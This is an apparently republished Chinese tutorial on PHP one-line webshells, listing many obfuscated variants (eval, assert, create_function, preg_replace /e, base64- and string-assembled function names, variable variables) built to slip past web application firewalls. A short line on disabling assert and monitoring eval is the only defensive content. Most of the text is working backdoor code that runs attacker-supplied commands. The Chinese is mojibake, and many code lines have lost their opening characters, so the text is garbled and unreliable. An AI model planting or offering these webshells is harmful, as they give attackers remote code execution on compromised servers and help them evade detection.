一句話木馬就是只需要一行代碼的木馬,短短一行代碼,就能做到和大馬相當(dāng)?shù)墓δ?。為了繞過waf的檢測,一句話木馬出現(xiàn)了無數(shù)中變形,但本質(zhì)是不變的:木馬的函數(shù)執(zhí)行了我們發(fā)送的命令。
我們可以通過 GET、POST、COOKIE這三種方式向一個網(wǎng)站提交數(shù)據(jù),一句話木馬用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']
接收我們傳遞的數(shù)據(jù),并把接收的數(shù)據(jù)傳遞給一句話木馬中執(zhí)行命令的函數(shù),進(jìn)而執(zhí)行命令。 所以看到的經(jīng)典一句話木馬大多都是只有兩個部分,一個是可以執(zhí)行代碼的函數(shù)部分,一個是接收數(shù)據(jù)的部分。
?php eval($_POST['a']) ?>
其中eval就是執(zhí)行命令的函數(shù),**$_POST[‘a(chǎn)']**就是接收的數(shù)據(jù)。eval函數(shù)把接收的數(shù)據(jù)當(dāng)作PHP代碼來執(zhí)行。這樣我們就能夠讓插入了一句話木馬的網(wǎng)站執(zhí)行我們傳遞過去的任意PHP語句。這便是一句話木馬的強大之處。
因為木馬是接收post請求中 “a” 的數(shù)據(jù)( $_POST[‘a(chǎn)']),所以我們必須以post方法發(fā)送數(shù)據(jù)并且將我們要執(zhí)行的代碼賦值給“a”。如果把木馬中的post替換成get,那么我么就需要以GET方法發(fā)送“a”,
使用 其他函數(shù)制作一句話木馬
?php assert(@$_POST['a']); ?>
?php$fun = create_function('',$_POST['a']);$fun();?>
把用戶傳遞的數(shù)據(jù)生成一個函數(shù)fun(),然后再執(zhí)行fun()
?php@call_user_func(assert,$_POST['a']);?>
call_user_func這個函數(shù)可以調(diào)用其它函數(shù),被調(diào)用的函數(shù)是call_user_func的第一個函數(shù),被調(diào)用的函數(shù)的參數(shù)是call_user_func的第二個參數(shù)。
這樣的一個語句也可以完成一句話木馬。一些被waf攔截的木馬可以配合這個函數(shù)繞過waf。
?php@preg_replace("/abcde/e", $_POST['a'], "abcdefg");?>
這個函數(shù)原本是利用正則表達(dá)式替換符合條件的字符串,但是這個函數(shù)有一個功能——可執(zhí)行命令。
這個函數(shù)的第一個參數(shù)是正則表達(dá)式,按照PHP的格式,表達(dá)式在兩個“/”之間。如果我們在這個表達(dá)式的末尾加上“e”,那么這個函數(shù)的第二個參數(shù)就會被當(dāng)作代碼執(zhí)行。
利用函數(shù)生成木馬
?php $test='?php $a=$_POST["cmd"];assert($a); ?>'; file_put_contents("Trojan.php", $test); ?>
函數(shù)功能:生成一個文件,第一個參數(shù)是文件名,第二個參數(shù)是文件的內(nèi)容。
?php$a='assert';array_map("$a",$_REQUEST);?>
上述定義參數(shù)a并賦值‘a(chǎn)ssert',利用array_map()函數(shù)將執(zhí)行語句進(jìn)行拼接。最終實現(xiàn)assert($_REQUEST)
。
?php$item['JON']='assert';$array[]=$item;$array[0]['JON']($_POST["TEST"]);?>
利用函數(shù)的組合效果,使得多個參數(shù)在傳遞后組合成一段命令并執(zhí)行。
?php$a = "eval";$a(@$_POST['a']);?>
第三行使用了變量函數(shù)$a,變量儲存了函數(shù)名eval,便可以直接用變量替代函數(shù)名。
waf是網(wǎng)站的防火墻,例如安全狗就是waf的一種。waf通常以關(guān)鍵字判斷是否為一句話木馬,但是一句話木馬的變形有很多種,waf根本不可能全部攔截。想要繞過waf,需要掌握各種PHP小技巧,掌握的技巧多了,把技巧結(jié)合起來,設(shè)計出屬于自己的一句話木馬。
?php$bb="eval";$aa="bb";$$aa($_POST['a']);?>
看這句就能理解上述語句:$$aa = ( ( (aa) = $ (‘bb') = $bb = “eval”
?php$a=str_replace("Waldo", "", "eWaldoval");$a(@$_POST['a']);?>
函數(shù)功能:在第三個參數(shù)中,查找第一個參數(shù),并替換成第二個參數(shù)。這里第二個參數(shù)為空字符串,就相當(dāng)于刪除"Waldo"。
?php$a=base64_decode("ZXZhbA==")$a($_POST['a']);?>
這里是base64解密函數(shù),"ZXZhbA=="是eval的base64加密。
?php$a="e"."v";$b="a"."l";$c=$a.$b;$c($_POST['a']);?>
?php$str="a=eval";parse_str($str);$a($_POST['a']);?>
執(zhí)行這個函數(shù)后,生成一個變量$a,值為字符串"eval"
6.1GET篇
?php $_GET[a]($_GET[b]); ?>
?php @eval( $_GET[$_GET[b]])>
利用方法:
b=cmdcmd=phpinfo()
6.2利用script代替? 、?>標(biāo)簽
script language="php">@eval_r($_GET[b])/script>
6.3利用session
1.404頁面
2.圖片木馬,用文件包含調(diào)用
繞過技巧:
tips:使用一句話木馬的時候可以在函數(shù)前加”@”符,這個符號讓php語句不顯示錯誤信息,增加隱蔽性。
1.禁用assert()函數(shù),監(jiān)控eval()
2.搜索日志的assert。
亦可能繞過:
?php $c=$_GET[n].'t'; @$c($_POST[cmd]); ?>
?php $c=base64_decode('YXNzZXI=').$_GET[n].'t'; @$c($_POST[cmd]); ?>
以上就是php一句話木馬變形技巧的詳細(xì)內(nèi)容,更多關(guān)于php一句話木馬變形技巧的資料請關(guān)注腳本之家其它相關(guān)文章!
標(biāo)簽:白城 唐山 鶴崗 鷹潭 克拉瑪依 遼陽 柳州 六安
巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《php一句話木馬變形技巧》,本文關(guān)鍵詞 php,一句話,木馬,變形,技巧,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。上一篇:深入理解php中unset()